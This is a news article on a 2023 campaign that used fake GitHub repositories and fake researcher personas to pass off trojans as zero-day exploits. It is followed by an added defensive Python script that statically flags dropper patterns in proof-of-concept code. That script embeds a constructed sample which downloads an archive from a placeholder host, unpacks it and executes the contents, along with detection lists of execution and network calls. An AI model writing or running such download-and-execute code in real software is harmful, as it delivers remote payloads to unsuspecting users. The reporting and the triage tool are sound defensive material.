In an unusual attack campaign, a hacker has been setting up rogue GitHub repositories that claim to host zero-day exploits for popular applications but instead deliver malware. The attacker also created fake GitHub and Twitter accounts posing as security researchers and even used real photos of researchers from well-known cybersecurity companies.
“The attacker has put a lot of effort into creating all these fake personas, only to deliver very obvious malware,” researchers from security firm VulnCheck, who discovered the rogue repositories, said in a report. “It’s unclear if they’ve been successful, but given that they’ve continued to pursue this avenue of attacks, it seems they believe they will be successful.”
While attacks that target security researchers aren’t a new development, they’re relatively rare and more likely to be the work of advanced persistent threat (APT) groups looking to gain access to the sensitive information that researchers handle. This was the case with a campaign reported by Google’s Threat Analysis Group in 2021, in which a government-backed North Korean entity created a web of fake accounts posing as security researchers on Twitter, Telegram, LinkedIn, and other social media platforms and used them to promote proof-of-concept exploits for existing vulnerabilities that were posted on a blog and in YouTube videos.
How the GitHub fake account campaign works
In that 2021 campaign, the fake accounts were used to contact real researchers and invite them to collaborate. As part of the communication, a Visual Studio project with proof-of-concept exploit code was shared, but the project also included a malicious DLL that deployed malware on the victim’s computer. Separately, some researchers who visited the blog had their fully patched systems exploited, suggesting the attackers had access to zero-day exploits.
VulnCheck came across the first rogue repository in early May and reported it to GitHub, which promptly took it down. That repository claimed to host a zero-day remote code execution exploit for Signal, a popular secure messaging app that is well regarded in the security community. The attacker then continued to set up new accounts and repositories with fake exploits for Microsoft Exchange, Google Chrome, Discord, and Chromium.
All were set up by fake accounts claiming to belong to researchers who work for a company called High Sierra Cyber Security, which does not appear to exist. Some of the same names and profile information were used to create Twitter accounts that were then used to promote the repositories, much like in the attack reported by Google.
However, the 2021 attack appears to have involved significantly more sophistication than this latest campaign, and there is no evidence it is the work of the same attackers. The malicious code distributed from the rogue GitHub repositories as a file called poc.py downloads one of two additional files depending on the operating system, one called cveslinux.zip and one called cveswindows.zip. The archive is then unpacked and the file inside is executed. The Windows payload is detected by 36 antivirus engines on VirusTotal as a trojan, while the Linux binary is flagged by 25.
“It isn’t clear if this is a single individual with too much time on their hands or something more advanced like the campaign uncovered by Google TAG in January 2021,” the VulnCheck researchers said. “Either way, security researchers should understand that they are useful targets for malicious actors and should be careful when downloading code from GitHub. Always review the code you are executing and don’t use anything you don’t understand.”
Experienced security researchers typically take precautions when working with potentially malicious code. If they’re testing a proof-of-concept exploit, that is most likely to happen on a test system inside a virtual machine that is closely monitored and later wiped. Executing such code on a work machine would most likely violate standard security policies in most organizations, especially inside a cybersecurity company.
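One way to put the “always review the code you are executing” advice into practice, as an added example that is not part of the original article or of VulnCheck’s report: a small static triage script that walks the AST of a Python proof of concept and flags the stages of the dropper chain described above (an OS check, a network fetch, an archive unpack, and a process execution), so a reviewer sees the pattern before anything runs. The sample poc.py below is constructed for illustration; its hostname is a placeholder and only the archive names come from the article.

```python
"""Static triage of a Python proof-of-concept script before running it.

Added example, not code from the article or from VulnCheck. It resolves
import aliases, then walks the script's AST looking for calls that belong
to the stages of a download-unpack-execute chain. The sample below is
constructed; example.invalid is a placeholder host, not a real indicator.
"""
import ast
from collections import defaultdict

# Fully qualified names that mark each stage of a dropper chain.
SUSPICIOUS_CALLS = {
    "platform": {"platform.system", "sys.platform"},
    "network": {"urllib.request.urlopen", "urllib.request.urlretrieve",
                "requests.get", "requests.post", "urllib2.urlopen"},
    "archive": {"zipfile.ZipFile", "tarfile.open"},
    "execute": {"subprocess.run", "subprocess.Popen", "subprocess.call",
                "os.system", "os.execv", "os.execvp", "os.popen", "os.startfile"},
}

# Constructed sample in the shape the article describes (hypothetical host).
SAMPLE_POC = '''\
import platform, zipfile, subprocess
from urllib.request import urlretrieve

# pick the archive for this OS, fetch it, unpack it, run what was inside
name = "cveslinux.zip" if platform.system() == "Linux" else "cveswindows.zip"
urlretrieve("http://example.invalid/" + name, name)
with zipfile.ZipFile(name) as z:
    z.extractall(".")
    payload = z.namelist()[0]
subprocess.run(["./" + payload])
'''


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def build_alias_map(tree):
    """Map local names to the module path they were imported from."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:                      # import urllib.request as ur
                    aliases[a.asname] = a.name
                else:                             # import urllib.request binds 'urllib'
                    top = a.name.split(".")[0]
                    aliases[top] = top
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:                  # from subprocess import Popen as P
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def resolve(name, aliases):
    """Rewrite the first segment of a dotted name through the alias map."""
    head, _, rest = name.partition(".")
    head = aliases.get(head, head)
    return f"{head}.{rest}" if rest else head


def triage(source):
    """Return {stage: sorted line numbers} for each suspicious call found."""
    tree = ast.parse(source)
    aliases = build_alias_map(tree)
    hits = defaultdict(set)
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
        elif isinstance(node, ast.Attribute):     # catches bare sys.platform reads
            name = dotted_name(node)
        else:
            continue
        if name is None:
            continue
        full = resolve(name, aliases)
        for stage, names in SUSPICIOUS_CALLS.items():
            if full in names:
                hits[stage].add(node.lineno)
    return {stage: sorted(lines) for stage, lines in hits.items()}


def verdict(hits):
    """Fetch + unpack + execute together is the dropper chain; flag it."""
    chain = {"network", "archive", "execute"}
    return "dropper chain" if chain <= hits.keys() else "review manually"


if __name__ == "__main__":
    found = triage(SAMPLE_POC)
    for stage, lines in found.items():
        print(f"{stage:9s} lines {lines}")
    print(verdict(found))
```

The check is deliberately a triage aid, not a verdict engine: obfuscated scripts (`getattr`, `exec` of decoded strings, dynamic `__import__`) slip past a name-based AST walk, so a “review manually” result means exactly that, and the actual run still belongs in a monitored, disposable VM as the article describes.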
Copyright © 2023 IDG Communications, Inc.